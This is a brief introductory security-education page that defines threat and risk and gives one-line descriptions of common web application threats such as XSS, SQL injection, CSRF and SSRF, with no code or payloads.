Common Threats & Risks

Threat

A threat is any potential source of harm or adverse event that may exploit a vulnerability in a system or an organization's security measures. Threats can originate from malicious actors, system flaws, or operational weaknesses.

Risk

Risk is the potential for loss or harm resulting from a threat exploiting a vulnerability in a system or organization. It considers both the likelihood of the event occurring and its impact if it does.

Common Web Application Threats

The impact and severity of each threat depend on the web application and its security measures. Below are some prevalent threats:

Cross-Site Scripting (XSS) – Injecting malicious scripts into web applications to execute in users’ browsers.

SQL Injection (SQLi) – Exploiting database queries to gain unauthorized access or manipulate data.

Cross-Site Request Forgery (CSRF) – Forcing a user to perform unintended actions without their consent.

Security Misconfigurations – Weak default settings or improperly configured security controls.

Sensitive Data Exposure – Poor encryption or handling of confidential information.

Brute-Force and Credential Stuffing Attacks – Repeated login attempts using stolen or guessed credentials.

File Upload Vulnerabilities – Allowing malicious file uploads leading to code execution or data leaks.

Denial-of-Service (DoS) or Distributed DoS (DDoS) – Overloading a system to make it unavailable.

Server-Side Request Forgery (SSRF) – Exploiting a server to make unauthorized internal requests.

Inadequate Access Controls – Weak authentication or authorization mechanisms.

Using Components with Known Vulnerabilities – Running outdated libraries, frameworks, or plugins.

Broken Access Control – Improper enforcement of user permissions, allowing unauthorized actions.

This is not an exhaustive list. Other threats exist, and new vulnerabilities continue to emerge. Effective security practices help mitigate these risks.